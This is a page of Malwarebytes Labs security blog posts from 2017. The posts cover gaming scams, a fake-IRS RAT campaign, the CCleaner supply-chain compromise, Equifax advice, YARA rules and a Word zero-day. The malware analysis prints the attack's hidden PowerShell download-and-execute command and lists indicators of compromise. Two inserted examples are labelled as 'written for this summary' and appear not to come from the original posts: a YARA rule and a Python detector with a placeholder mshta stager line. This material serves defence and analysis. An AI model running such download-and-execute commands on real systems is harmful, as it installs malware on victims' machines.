Techie Feeds

Don’t let these gaming threats give you a Game Over

Malwarebytes - Thu, 09/21/2017 - 20:24

With EGX, the biggest gaming event in the UK opening its doors today, we thought it’d be timely to remind you of some of the threats currently facing gamers. No matter what type of game, client, or system you use, there’s always something waiting to try and give you a bad day where the safety of your account is concerned.

GTAV cash generators

Some games, like GTAV, involve an amount of “grinding” (performing potentially repetitive tasks) to get what you want. In this case, that means incredibly expensive items/additional content which are free to download, but cost in-game money to make use of. In GTAV, you can buy in-game currency with real money to speed up the process, grind, or turn to the internet in search of free money tools. While modders in game sessions can – and do – spawn money from the sky, or simply add cash to your account, the huge pile of YouTube videos and web comments claiming to offer free services online are all fake. The so-called money generators are merely survey scams, which lead to requests for personal information or downloadable files (which may or may not be malicious).

Steam scams

These are very popular, especially with accounts being able to buy and sell (expensive) digital items for various titles, adding extra desirability to scammers wanting to make a quick buck. Phishing is a mainstay of Steam scams; other attacks, such as swiping a Steam SSFN file to bypass Steam Guard are much more sophisticated. Be wary of fake item trades, especially if they don’t lead to an official Steam URL – you may well be looking at a static phishing page, or one which scrapes some elements from the real thing to appear legitimate.

Read: Something’s phishy: How to detect phishing attempts

Swatting
The act of sending armed law enforcement round to a game streamer’s house, which could potentially be fatal. Streamers usually get caught by this by being too open with their personal information – quite often, you’ll find out all you need to know about your target simply by listening to them stream. Before you know it, they’ll have casually mentioned locations, even nearby streets where their friends live, and much more besides. Calls to said friends pretending to be someone else, for example, will fill in the missing pieces of the puzzle.

Ironically, the main way to avoid swatting (for the most part) is to tell people who make a living out of talking to stop talking about themselves (just a little bit). This is no guarantee of safety; many other ways exist to obtain a home address via publicly available information. All in all, streaming is a bit of a dangerous pastime.

Game company hacks

There’s not a huge amount you can do when the gatekeepers of your data get popped, but that doesn’t mean you should be complacent. Many game companies and hardware makers now offer additional forms of security such as key fobs and two-factor authentication, which you should make use of whenever possible. You may also wish to use a password manager to ensure you’re not just reusing the same passwords everywhere, which could lead to additional compromises. Modern gaming can require multiple passwords across different gaming platforms just to play one game, so it’s fairly common to see video game password burnout – don’t fall for it!

Fake emulators

It’s becoming increasingly difficult to obtain old game consoles, much less play the original titles. Even on consoles where backwards compatibility exists, titles differ from how they were originally: licensed music has been replaced, the control scheme is different, maybe it works properly on this console but not on that mobile device, and anyway it’s funded by ads, and so on.

Enter, stage left: fake emulators. It is still challenging to emulate most of the last generation (or two) of consoles, and you should be extremely wary where such claims are concerned.

These are some of the most common problems we see on a daily basis in gaming land; feel free to offer up some of the scams you’ve seen doing the rounds in the comments below. Safe gaming!


The Malwarebytes Labs Team

The post Don’t let these gaming threats give you a Game Over appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fake IRS notice delivers customized spying tool

Malwarebytes - Thu, 09/21/2017 - 15:00

While macro-based documents and scripts make up the majority of malspam attacks these days, we also see some campaigns that leverage documents embedded with exploits. Case in point, we came across a malicious Microsoft Office file disguised as a CP2000 notice. The Internal Revenue Service (IRS) usually mails out this letter to taxpayers when information is incorrectly reported on a previous return.

Victims who fall for the scam will infect themselves with a custom Remote Administration Tool. A RAT can be utilized for legitimate purposes, for example by a system administrator, but it can also be used without a user’s consent or knowledge to remotely control their machine, view and delete files, or deploy a keylogger to silently capture keystrokes.

In this blog post, we will review this exploit’s delivery mechanism and take a look at the remote tool it deploys.


The malicious document is hosted on a remote server and users are most likely enticed to open it via a link from a phishing email. The file contains an OLE2 embedded link object which retrieves a malicious HTA script from a remote server and executes it. In turn, it downloads the final payload, all with very little user interaction required since it is using CVE-2017-0199, first uncovered in April 2017 as a zero-day.


The embedded link points to an HTA script hosted in an unexpected location – a Norwegian company’s compromised FTP server – which invokes PowerShell to download and execute the actual malware payload.

ftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://82.211.30[.]108/css/intelgfx.exe', 'C:\Users\[username]\AppData\Roaming\62962.exe');

Payload

The downloaded payload (intelgfx.exe) extracts several components into a local folder and achieves persistence using a decoy shortcut. The VBS scripts ensure that the main module runs without showing its GUI, in order to remain invisible to the victim.

RMS agent stands for Remote Manipulator System and is a remote control application made by a Russian company. It appears that in this case, the attackers took the original program (as pictured below) and slightly customized it, not to mention the fact that they are using it for nefarious purposes, namely spying on their victims.

Its source code shows the debugging path information and name that they gave to the module.

Office exploits and RATs

This is not the first time that CVE-2017-0199 has been used to distribute a RAT. Last August, TrendMicro described an attack where the same exploit was adapted for PowerPoint and used to deliver the REMCOS RAT. It also shows that threat actors often repackage existing toolkits – which can be legitimate – and turn them into full-fledged spying applications.

We reported the compromised FTP server to its owner. Malwarebytes users were already protected against CVE-2017-0199 as well as its payload which is detected as Backdoor.Bot.

Thanks to @hasherezade for help with payload analysis.

Indicators of compromise

Word doc CVE-2017-0199

82.211.30[.]108/css/CP2000IRS.doc 47ee31f74b6063fab028111e2be6b3c2ddab91d48a98523982e845f9356979c1

HTA script

ftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta d01b6d9507429df065b9b823e763a043aa38b722419d35f29a587c893b3008a5

Main package (intelgfx.exe)

82.211.30[.]108/css/intelgfx.exe 924aa03c953201f303e47ddc4825b86abb142edb6c5f82f53205b6c0c61d82c8

RAT module


Other IOCs from same distribution server

82.211.30[.]108/estate.xml
82.211.30[.]108/css/qbks.exe

The post Fake IRS notice delivers customized spying tool appeared first on Malwarebytes Labs.

FTC providing partial refunds for Advanced Tech Support victims

Malwarebytes - Wed, 09/20/2017 - 15:00

Last month, the FTC announced the recovery of 10 million dollars from Advanced Tech Support, one of the most successful US-based tech support scammers ever. This money will be put towards partial refunds for victims of ATS who purchased products or services from them between April 2012 and November 2014. Per the FTC announcement, the deadline for a refund is October 27. To repeat:

The deadline for a refund application is October 27.

Restitution from Advanced Tech Support is notable because most scams based in the United States structure their finances such that only a small core of founders ever see a significant profit. These founders then tend to spend most of their money on extravagant parties, vacations, and other ostentatious displays of wealth – leaving very little to recover. Due to these factors, it’s noteworthy that the FTC was able to recover any significant amount of money at all.

Advanced Tech Support, otherwise known as Inbound Call Experts, has had a lengthy history with Florida law enforcement and the FTC. Check out their case history here, where you can follow the long road it took to bring this company to justice. And remember:

The deadline for a refund application is October 27.

The post FTC providing partial refunds for Advanced Tech Support victims appeared first on Malwarebytes Labs.

How to tell if your Mac is infected

Malwarebytes - Tue, 09/19/2017 - 15:00

There are a lot of reasons Mac users don’t sweat getting infected. One: They’ve got a built-in anti-malware system called XProtect that does a decent job of catching known malware. Two: Macs are not plagued by a high number of attacks. (Most cybercriminals are focused on infecting PCs.) And three: There’s just not a lot of Mac malware out there.

But that’s changing, and fast: Mac malware has increased by 230 percent in the last year alone. Most Mac users don’t know this, and assume their Mac is fine. For those folks we have one word: adware.

Your Mac is infected…with adware

Adware is software that’s designed to display advertisements, usually within a web browser. Most people don’t willingly download programs whose sole purpose is to bombard you with ads, so adware has to sneak its way onto your Mac. It either disguises itself as legitimate or piggybacks on another program in order to be installed.

Once in your system, adware changes the way your browser behaves by injecting ads into web pages, causing pop-up windows or tabs to open, and changing your homepage or search engine—all in the name of funneling advertising dollars away from companies who pay for online ads and into their own accounts.

Your Mac is infected…and not protected

Sounds pretty shady, right? So why doesn’t the Mac anti-malware program catch these guys? Typically, the makers of adware are hiding in plain sight, operating as actual corporations who claim to sell software on the level. They get away with it because their adware is often hidden in the fine print of a long installation agreement that most people skip over. Is it technically legal? Yes. You accepted the terms of the installation, so they can spam you all they want. But is it right? So far, Apple hasn’t stepped in to crack down on it. But if you ask us, the answer is an emphatic “no.”

In addition to adware, other potentially unwanted programs, such as so-called “legitimate” keyloggers, scammy “cleaning” apps, and faux antivirus programs that don’t actually detect anything are skirting the Mac protections in place. (Because XProtect doesn’t detect and block adware or potentially unwanted programs—only malware that it has seen before.) So if a new form of malware makes its way onto your computer before Apple has a chance to learn about it and write code to protect against it, then you’re out of luck.

So if you ask us, it’s time to start taking a closer look at your Mac. Is it acting the way your sturdy, reliable Mac has always behaved? Or is it exhibiting classic signs of guilt? If something seems a little off, you just might have a problem. Let’s take a look at the telltale signs that your Mac is infected.

Signs of adware

Advertisements are displayed in places they shouldn’t be, literally popping up everywhere. Your web browser’s homepage has been mysteriously changed without your permission. Web pages that you typically visit are not displaying properly, and when you click on a website link, you get redirected to an entirely different site. In fact, even your search engine has been replaced with a different one. If your web browser, search engine, or websites are acting in funky, unpleasant ways, you’ve likely got yourself an adware infection.

Signs of PUPs

Maybe you downloaded a new program to monitor your family’s behavior online. All of a sudden, new icons are appearing on your desktop for software you don’t remember installing. New toolbars, extensions, or plugins are added to your browser. A pop-up appears telling you your Mac may be infected, and you need to install the latest antivirus immediately to get rid of it. Frightened, you do so, and now your computer has turned the corner from automatically installing apps to slowing to a crawl. What’s going on? These are PUPs, and your Mac’s anti-malware system is not going to get rid of them.

Signs of malware

Mac malware making its way onto your system is, right now, relatively rare. But if it does, you may see behavior similar to that of an infected Windows system: your computer’s processing power seems diminished, software programs are sluggish, your browser redirects or is unresponsive, or your ol’ reliable starts crashing regularly.

In some cases, you may not be aware of an infection at all. While your computer hums along, info stealers operate quietly in the background, stealing your data for an attack on your bank accounts or identity.

And in the worst-case scenario, your Mac can even be infected with ransomware. In March 2016, the first Mac ransomware was spotted, and it was downloaded by thousands of users before Apple had a chance to shut it down. A ransomware attack would be quite obvious to Mac users. Files would be encrypted and cybercriminals would deliver a ransom demand (usually via pop-up) in order to return your data.

Do any of these scenarios sound familiar to you? If so, there are a few steps you can take to remedy the infection. First, back up your files. Next, download a (legitimate) anti-malware program such as Malwarebytes for Mac that’s designed to search and destroy adware, PUPs, and any new forms of malware lurking on the scene. Run a scan and, if there are any nasties hiding away in your pristine Mac OS, it’ll bag, tag, and dump them for you. Then you can finally get your Mac back.

The post How to tell if your Mac is infected appeared first on Malwarebytes Labs.

A week in security (September 11 – September 17)

Malwarebytes - Mon, 09/18/2017 - 22:10

Last week, we dug into phishing campaigns run via LinkedIn accounts, remediation versus prevention, issues with smart syringe pumps, and advised you to go patch against a Word 0day. We had some tips regarding identity theft protection, explored crowdsourced fraud, and explained YARA rules.


Consumer News

Stay safe!

Malwarebytes Labs Team

The post A week in security (September 11 – September 17) appeared first on Malwarebytes Labs.

Infected CCleaner downloads from official servers

Malwarebytes - Mon, 09/18/2017 - 15:31

In a supply chain attack that may be unprecedented in the number of downloads, servers hosting CCleaner, a popular tool for cleaning up the PC, have been delivering a version of the software bundled with malware.

What happened?

Threat actors have managed to change the files that were being delivered by Avast servers hosting CCleaner updates. In case you are wondering why they were on those servers, Avast acquired Piriform, the original publishers of CCleaner, a few months ago.

The incident was discovered and reported by Talos. Piriform is aware of the situation and is acting to prevent further damage. They are also investigating how the files coming from their servers were modified before being released to the public.

Possible impact

It is difficult to say at this moment how many users might have been affected, but the numbers could be huge. From the statistics brought out by Piriform, CCleaner has been downloaded 2 billion times in total, 5 million times every week. The modified version, 5.33, was made available from August 15 until September 12, when version 5.34 was released. In a press statement the company estimates that 2.27 million people used the affected software.

The malware

The malware collects the following information about the infected system:

  • Computer name
  • A list of installed software, including Windows updates
  • A list of the currently running processes
  • The MAC addresses of the first three network adapters
  • Other system information that is relevant for the malware like admin privileges, whether it is a 64-bit system, etc.

The malware uses a hardcoded C2 server, with a domain generation algorithm (DGA) as a backup, to send information about the affected system and fetch the final payload.

What to do if you think you are affected?

First of all, check the version of CCleaner on your system. If you suspect you may have downloaded CCleaner version 5.33.6162 or CCleaner Cloud version 1.07.3191, scan your system for malware.


CCleaner users who are running older versions, or who do not trust the one they are using now, are encouraged to update their CCleaner software to version 5.34 or higher. The latest version is available for download here.

Affected versions: CCleaner version 5.33.6162 and CCleaner Cloud version 1.07.3191

Malwarebytes blocks the IP and domains related to this malware. We also remove the malicious installer.

Stay safe!


Pieter Arntz

The post Infected CCleaner downloads from official servers appeared first on Malwarebytes Labs.

Explained: YARA rules

Malwarebytes - Fri, 09/15/2017 - 15:00

YARA rules are a way of identifying malware (or other files) by creating rules that look for certain characteristics. YARA was originally developed by Victor Alvarez of VirusTotal and is mainly used in malware research and detection. It was developed with the idea of describing patterns that identify particular strains or entire families of malware.


Each rule has to start with the word rule, followed by the name or identifier. The identifier can contain any alphanumeric character and the underscore character, but the first character is not allowed to be a digit. There is a list of YARA keywords that are not allowed to be used as an identifier because they have a predefined meaning.


Rules are composed of several sections. The condition section is the only one that is required. This section specifies when the rule result is true for the object (file) that is under investigation. It contains a Boolean expression that determines the result. Conditions are by design Boolean expressions and can contain all the usual logical and relational operators. You can also include another rule as part of your conditions.


To give the condition section a meaning you will also need a strings section. The strings section is where you define the strings that will be looked for in the file. Let’s look at an easy example.

rule vendor
{
    strings:
        $text_string1 = "Vendor name" wide
        $text_string2 = "Alias name" wide
    condition:
        $text_string1 or $text_string2
}

The rule shown above is named vendor and looks for the strings “Vendor name” and “Alias name”. If either of those strings is found, then the result of the rule is true.

There are several types of strings you can look for:

  • Hexadecimal, in combination with wild-cards, jumps, and alternatives.
  • Text strings, with modifiers: nocase, fullword, wide, and ascii.
  • Regular expressions, with the same modifiers as text strings.

There are many more advanced conditions you can use, but they are outside the scope of this post. If you would like to know more you can find it in the YARA documentation.


Metadata can be added to help identify the files that were picked up by a certain rule. The metadata identifiers are always followed by an equal sign and the set value. The assigned values can be strings, integers, or a Boolean value. Note that identifier/value pairs defined in the metadata section can’t be used in the condition section, their only purpose is to store additional information about the rule.
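As an added example written for this summary (it is not from the original post or from any published rule set), the rule file below exercises each part discussed: the vendor rule from the post, a metadata section with string, integer and Boolean values, the three string types with their modifiers, and a condition that references another rule. All rule names, strings and metadata values are constructed.

```yara
// Constructed example rule file (not from the original post or any real
// detection set). Rule names, strings and metadata values are made up.

// The simple rule from the post, repeated so this file stands alone.
rule vendor
{
    strings:
        $text_string1 = "Vendor name" wide
        $text_string2 = "Alias name" wide
    condition:
        $text_string1 or $text_string2
}

// A rule that uses every section type: meta, strings and condition.
rule constructed_hidden_downloader_stub
{
    meta:
        description = "Constructed: PE that carries a hidden PowerShell download stub"
        author      = "example analyst"     // string value
        severity    = 3                     // integer value
        in_the_wild = false                 // Boolean value

    strings:
        // Hexadecimal strings. Wildcards (??) skip bytes that vary between
        // files; here a typical MZ header with the two variable bytes masked.
        $mz = { 4D 5A ?? ?? 03 00 }
        // A jump ([0-8]) allows 0 to 8 arbitrary bytes, and (a | b) gives
        // alternatives: "This program" ... "cannot" or "must" (DOS stub text).
        $dos_stub = { 54 68 69 73 20 70 72 6F 67 72 61 6D [0-8] ( 63 61 6E 6E 6F 74 | 6D 75 73 74 ) }

        // Text strings with modifiers: nocase, fullword, ascii and wide (UTF-16LE).
        $ps     = "powershell" nocase ascii wide
        $hidden = "-WindowStyle Hidden" nocase
        $dl     = "DownloadFile" fullword

        // Regular expression with a modifier: an http(s) URL ending in .exe.
        $url = /https?:\/\/[a-z0-9.\-\/]+\.exe/ nocase

    condition:
        // Boolean expression combining string matches, an offset check,
        // a file-size check, and a reference to the "vendor" rule above.
        $mz at 0 and $dos_stub and filesize < 2MB
        and ($ps or $hidden) and $dl and $url
        and not vendor
}
```

Running yara with this file against a directory reports only files that match the second rule's full condition; the "not vendor" clause shows how one rule can exclude files already classified by another.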


YARA is a tool that can be used to identify files that meet certain conditions. It is mainly in use by security researchers to classify malware.


Signature-Based Detection With YARA

Latest YARA documentation

YARA: Simple and Effective Way of Dissecting Malware

Screenshots were made using Yara Editor by Adlice Software

Pieter Arntz

The post Explained: YARA rules appeared first on Malwarebytes Labs.

Crowdsourced fraud and kickstarted scams

Malwarebytes - Thu, 09/14/2017 - 16:00

Crowdsourced funding opportunities via Kickstarter, Patreon, and GoFundMe have removed many structural roadblocks for people to access capital quickly and conveniently. But they’ve also lowered the barrier to entry for many very old scams. So how do you tell the difference between a great cause or project to contribute to and a digital confidence scam? What’s outright fraudulent, and what’s just a company with poor organizational skills? Let us take a look at pitfalls on two crowdfunding platforms.

GoFundMe primarily serves personal projects and donation pages, or other campaigns that otherwise don’t fit the more common commercial model found on Kickstarter. Funding requests cover a wide range of needs, from community sports groups to disaster relief, to education and medical care (for US users). It sounds like a great use of crowdfunding, but when it comes to fraud, things start to get a little iffy. Here’s what GoFundMe’s terms of service (ToS) have to say about its giving campaigns.

GoFundMe has no control over the conduct of, or any information provided by, a Campaign Organizer or a Charity, and GoFundMe hereby disclaims all liability in this regard to the fullest extent permitted by applicable law.

So as far as they’re concerned, buyer beware. But as a platform, they do have some minimal obligations, as well as some additional rules to not run afoul of some onerous regulations. To summarize their ToS, here’s what you can’t raise money for:

  • Drugs
  • Weapons
  • Any financial product
  • Gambling
  • Hate speech
  • Porn
  • Legal defense
  • Fraud

But wait a minute – how can fraud be on the list if they say they won’t vet campaigns? Because these categories largely are about liability and are included to absolve the platform of after-the-fact responsibility. The first four categories can place GoFundMe under regulatory scrutiny, however, and are most likely patrolled by counter-fraud algorithms. If you’d like to know what GoFundMe considers fraud, you can go to their page on the subject, which oddly does not say anything on the matter. They do have a fraud report form, but it requires proof of intentional deception on the part of the organizer. You can go to for examples of how difficult that is.


Kickstarter does a little bit better regarding fraud, requiring that the creators have an actual production plan and prototype to show backers, and prohibits an extensive list of backer rewards. Most important is the list of creator requirements, in particular:

You [must] have an address, bank account, and government-issued ID based in the country that you’re creating a project in.**

This single requirement raises the barrier to entry for most scammers and gives Kickstarter tools to track and permanently deal with scams that make it onto the platform. Further, they claim to vet projects to make sure they meet company guidelines before they go live. This is great for the vast majority of online scams that are blatantly fraudulent. Their track record on projects whose vetting requires domain expertise is considerably worse.

SecuritySnakeOil.Org is a site devoted to scammy information security projects on Kickstarter. Most of the projects on review combine open source hardware or software, expansive marketing claims, and entry-level security flaws. From “unhackable” routers made from a Raspberry Pi running a years-old build of Debian, to products that advertise “A custom operative system (OS) to avoid hacking”, what most of these share is that they cannot be vetted properly without domain expertise. That is, if you don’t know anything about the field, you would have difficulty evaluating their marketing claims, and the project creators don’t do a lot to help.

Even more legitimate projects, such as this Wi-Fi router with a built-in VPN that blocks ads at the perimeter (Neat!), provide no details about any specific technology used in the product. So without adequate, accessible information on what you’re backing, how can you possibly make a safe choice?

What to do about it

Both GoFundMe and Kickstarter offer organizers the ability to link their Facebook account to their pitch. For GoFundMe, this allows you to see if the organizer is, in fact, someone connected to the cause and in a reasonable position to get the funds to the right place. For Kickstarter, Facebook can provide a name to look up an organizer’s employment history (or lack thereof.) But a better question to ask for a project involving an actual product would be this: Are the owner’s claims physically possible?

And lastly, the question that has protected people from fraud for time immemorial: Is this too good to be true?

The post Crowdsourced fraud and kickstarted scams appeared first on Malwarebytes Labs.

Equifax aftermath: How to protect against identity theft

Malwarebytes - Thu, 09/14/2017 - 15:00

Who here is scrambling around in the aftermath of the recent breach at Equifax to figure out if you’ve been compromised? Who here is wondering what to do about it if you are? If you’re one of the 143 million Americans whose data was accessed by cybercriminals, then you probably raised your hand.

Even if you weren’t one of the 143 million, you might still want to take some precautions. You could instead be part of the millions of folks who’ve had their data stolen over the course of online history. Basically, if you have a social security number, have ever run a credit check, or have a pulse, you should listen up. Why? Two words: identity theft.

What could happen?

The Equifax breach gave criminals access to vital personal information, including names, social security numbers, birthdates, addresses, and in some cases, driver’s license IDs and credit card numbers. And here’s just a slice of what those jerks can do with that data:

  • Open financial accounts
  • Apply for credit cards, mortgages, and other financial services
  • Get medical care at your expense
  • File for a tax refund in your name
  • Get a job in your name and let you pay the taxes
  • Steal your benefits
  • All of the above (aka, identity theft)

Who is impacted?

The better question might be, who isn’t? Don’t worry about verifying if your data was stolen—assume it was stolen. This is a decent rule of thumb even before the Equifax breach, but even if that thought never crossed your mind, it’s pretty impossible to verify whether you’ve been impacted at the moment.

The Equifax verification site is currently not returning accurate information. And if you try calling the company now, you might be met with some long waiting times to receive frustratingly vague answers. So if you want to act quickly (and we recommend you do), just bypass the first four stages of grief and go directly to acceptance.

What we do know: Those affected by the breach are predominantly from the US, but there are people from Canada and the UK impacted as well. Some methods that work in one country may not work in others, so please keep in mind that this article is aimed at our US readers. International readers can find some additional information about what to do here.

Steps to protect yourself

Our recommendation is to freeze your credit immediately with all three of the major credit bureaus. By freezing your credit, you’ll prevent criminals from trying to open up new accounts in your name—all of your current credit cards will still work. You’ll only need to consider unfreezing your credit if you want to apply for a loan, open a new credit card, or make any type of purchase that requires a check on your credit.

Three things you’ll want to know before contacting the credit bureaus.

One: You’ll want to pull a credit report. You can get a free report here. It doesn’t matter if you’ve already frozen your accounts, you can still monitor using the free tool. We recommend you pull only one report now, another one in four months, and the third in another four months. It’s not foolproof, but it will allow you to see different reports throughout the year to track any potential changes.

Two: the cost is minimal. While reports have varied—Equifax is offering their credit freeze for free, but it’s pretty hard to get through to them—freezing credit usually only costs a one-time fee of $10 per bureau. That’s 20 or 30 bucks for a whole lot of peace of mind.

Three: You must set or receive PINs when freezing your credit. Save these in a secure location, whether that’s using a password manager or physically storing the printed PIN paper someplace safe and out of sight.

Where to go to freeze your credit

Additional monitoring services

The use of additional monitoring services is entirely up to you. The biggest issue is that both legitimate companies trying to help and scammer companies trying to trick will over-hype the danger of identity theft in order to make a sale. Please make sure that you do your homework and research on these companies before signing up blindly out of fear.

When looking up information about how to protect yourself in situations like these, look to sites like the Federal Trade Commission or other technology publications such as Wired, The Verge, or Vice’s Motherboard, as they won’t be trying to upsell you to credit protection you may or may not need. The wrong company might actually hurt your ability to stave off ID theft.

General best practices

We wish we could say that the above advice is going to save you from all the dangers associated with this breach. For credit theft, you are covered, but for all the other threats associated with scammers or fraudsters looking to capitalize on this situation, here are some additional guides on how to avoid their traps.


Be on the alert for credit scams or any related terms. You’ll see these in emails, ads on social sites or games, and even physical mail to your home. These attacks are part of what we refer to as social engineering, and they will run rampant for many months and years to come. Always be skeptical, and if you’re not sure about something, ask a professional.

Phone or text scams

Since your data was most likely taken, that means your numbers will be shared even more than they already are today. Calls and texts from unknown numbers, numbers with similar area codes, or numbers very similar to yours should be treated as potential scams.

You might think that the National Do Not Call Registry would protect you from this. Sadly, it does not. It offers protection from legit companies trying to solicit your business. It does not offer protection against scammers. (Because why would criminals follow the law, anyway?)

my Social Security account

The my Social Security account allows you to keep track of the social security funds you’ll be collecting in the future. Although it was not affected by the Equifax breach, it’s good practice to get this account set up in your name, as someone else could easily grab it and you’d be locked out of your future payments. One caveat: If you want to set up this account, you’ll need to do it before you freeze your credit. (Otherwise they can’t confirm your identity through the account.)

Passwords and two-factor authentication

Ensure you’re using smart password strategy (complex, do not repeat them, do not use the same one across multiple sites/services, etc.) and if available, enable two-factor authentication (2FA) on every account possible. You can check the 2FA availability on your sites and services here.

Enable alerts on your accounts

While your current accounts shouldn’t be impacted by this breach, it’s never a bad idea to keep an eye on your bank accounts and credit cards for larger purchases. For accounts rarely used, you could set alerts to $1 so you’re notified the second any transaction happens. For regular accounts, set the alerts to a dollar amount that would seem out of place for that card, whether it’s $20 or $500.

New phone accounts

A common attack vector with credit/personal data breaches is to purchase new phone accounts through your provider, on your account! Once criminals have your info, they’ll call up the phone company and say they want to add a new line but don’t have their PIN. If you haven’t set up a PIN with your phone company already, they have no way to verify your account. So guess what? BAM! There’s a new phone on your bill. To protect yourself from this type of attack, go ahead and set up a PIN with your provider.


File these as soon as possible next year! For multiple years we’ve heard about victims of tax return fraud, wherein a scammer using your personal information files YOUR return before you can. So don’t wait on this one.


If you’re affected by the Equifax breach, you have a heightened risk of becoming a victim of identity theft. But at this juncture, the point is moot. Since it’s difficult to discover a definitive answer, it’s best to assume you are and deal with the fallout.

We’ve given you some direction on what to do to avoid identity theft and credit fraud, and we hope you take a deep breath, crack your neck, and get to work nailing your personal info down. One new credit card created by an attacker in your name is going to cause a massive headache. Better to stay ahead of it than spend the next month trying to convince a bank that you didn’t open an account. Good luck, be vigilant and stay safe.


The Malwarebytes Labs team

The post Equifax aftermath: How to protect against identity theft appeared first on Malwarebytes Labs.

Categories: Techie Feeds

PSA: New Microsoft Word 0day used in the wild

Malwarebytes - Wed, 09/13/2017 - 22:49

Microsoft has just patched an important vulnerability in Microsoft Word during its latest patch Tuesday cycle. According to the security firm that found it [1], this new zero-day (CVE-2017-8759) was used in targeted attacks to install a piece of malware known as FinFisher.

Microsoft Office has been in the line of fire throughout the year with malware distributors employing various social engineering techniques to trick users into opening up booby-trapped documents laced with exploits or macros. Indeed, while drive-by download activity has plummeted, malicious spam has been the dominant threat.

In this blog post, we do a quick review of this latest exploit and how future attackers are likely to add it to their own campaigns.

Infection flow

CVE-2017-8759 leverages improper validation in a parsing module for the Web Services Description Language (WSDL), which leads to arbitrary code injection and execution. As we have seen many times in previous attacks, mshta.exe is used to retrieve a script and eventually the malware payload.

Figure 1: Traffic view showing script and payload retrieval

Figure 2: Process view showing infection technique
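The process view in Figure 2 is the part of this chain a defender can alert on without knowing the exploit: an Office application should never need to launch mshta.exe or another script host. The following is an added example, not Malwarebytes code, that runs that rule over constructed process-creation log lines; the simplified `pid=… ppid=… image="…" cmdline="…"` format, the placeholder hostname in the mshta command line, and the lists of Office parents and script hosts are all assumptions, but the same fields exist in Sysmon Event ID 1 or any EDR process telemetry.

```python
"""Flag an Office parent spawning a script host (mshta.exe etc.), walking up to
MAX_DEPTH ancestors so that mshta -> cmd grandchildren are caught as well."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Parent applications that have no business launching script hosts (assumption).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children that, under an Office ancestor, indicate exploit or macro activity (assumption).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "rundll32.exe"}
MAX_DEPTH = 3  # how many ancestors to inspect when looking for an Office parent


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable basename, lower-cased
    cmdline: str


# Constructed, simplified process-creation line format used by the sample log below.
LINE_RE = re.compile(r'pid=(\d+)\s+ppid=(\d+)\s+image="([^"]+)"\s+cmdline="([^"]*)"')


def parse_line(line: str) -> Optional[ProcEvent]:
    """Turn one log line into a ProcEvent; returns None for lines that do not match."""
    m = LINE_RE.search(line)
    if not m:
        return None
    pid, ppid, image, cmdline = m.groups()
    basename = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return ProcEvent(int(pid), int(ppid), basename, cmdline)


def office_ancestor(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> Optional[ProcEvent]:
    """Return the nearest Office application among ev's ancestors, or None."""
    cur, depth = ev, 0
    while depth < MAX_DEPTH:
        parent = by_pid.get(cur.ppid)
        if parent is None:
            return None
        if parent.image in OFFICE_APPS:
            return parent
        cur, depth = parent, depth + 1
    return None


def detect(lines: List[str]) -> List[dict]:
    """Run the rule over a batch of log lines and return one alert per offending process."""
    events = [e for e in (parse_line(l) for l in lines) if e]
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        if ev.image not in SCRIPT_HOSTS:
            continue
        anc = office_ancestor(ev, by_pid)
        if anc:
            alerts.append({"child": ev.image, "child_pid": ev.pid,
                           "office_parent": anc.image, "office_pid": anc.pid,
                           "cmdline": ev.cmdline})
    return alerts


# Constructed sample log: explorer -> WINWORD -> mshta -> cmd, plus two benign controls.
SAMPLE_LOG = [
    r'pid=100 ppid=1 image="C:\Windows\explorer.exe" cmdline="explorer.exe"',
    r'pid=200 ppid=100 image="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" cmdline="WINWORD.EXE /n invoice.docx"',
    r'pid=300 ppid=200 image="C:\Windows\System32\mshta.exe" cmdline="mshta.exe hxxp://STAGER-PLACEHOLDER.test/stage.hta"',
    r'pid=310 ppid=200 image="C:\Windows\splwow64.exe" cmdline="splwow64.exe"',            # print helper: benign child
    r'pid=400 ppid=100 image="C:\Windows\System32\mshta.exe" cmdline="mshta.exe C:\tools\local.hta"',  # no Office ancestor
    r'pid=500 ppid=300 image="C:\Windows\System32\cmd.exe" cmdline="cmd.exe /c CONSTRUCTED-PLACEHOLDER"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Only two of the six processes trip the rule: mshta.exe directly under WINWORD.EXE, and the cmd.exe it spawned, which is caught because the ancestor walk looks past the immediate parent. The mshta.exe launched from Explorer and the print helper under Word are left alone, which is the behaviour you want before deploying such a rule fleet-wide.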

Payload delivery implications

Depending on how the malicious document is delivered, it can require little or no user interaction in order to infect the target. In the former case, the document could be downloaded from a website or come as spam. It would bear the Mark of the Web and be flagged. In the latter case where the document was packaged – for example using 7zip – it could lose that MotW [2].

Figure 3: Side-by-side comparison of the same file, distributed differently.

In the first case, the user will be prompted to “Enable Editing” (which admittedly is less suspicious than enabling macros). This, in turn, will trigger the malicious code to execute.

Figure 4: CVE-2017-8759 attempt blocked (Protected View mode)

In the second case, where the MotW has been lost, the malicious Word document will immediately run its payload:

Figure 5: CVE-2017-8759 attempt blocked (normal mode)

If you haven’t done it yet, we strongly advise you to run Windows Update and apply the latest security patches. If experience is any guide, each time a new zero-day is exposed, other online criminals jump in and rush to add it to their arsenal. This means that what was a small and targeted attack can all of a sudden become a widespread campaign.

Malwarebytes users were already protected against this exploit when it was still a zero-day. Additionally, we detect and block the FinFisher malware payload.


[1] FireEye,

[2] Eric Lawrence,

Indicators of compromise

Malicious Word document:




Network traffic:

91.219.236[.]207/img/office.png
91.219.236[.]207/img/word.db
91.219.236[.]207/img/left.jpg



Multiple flaws found in smart syringe pump

Malwarebytes - Wed, 09/13/2017 - 16:27

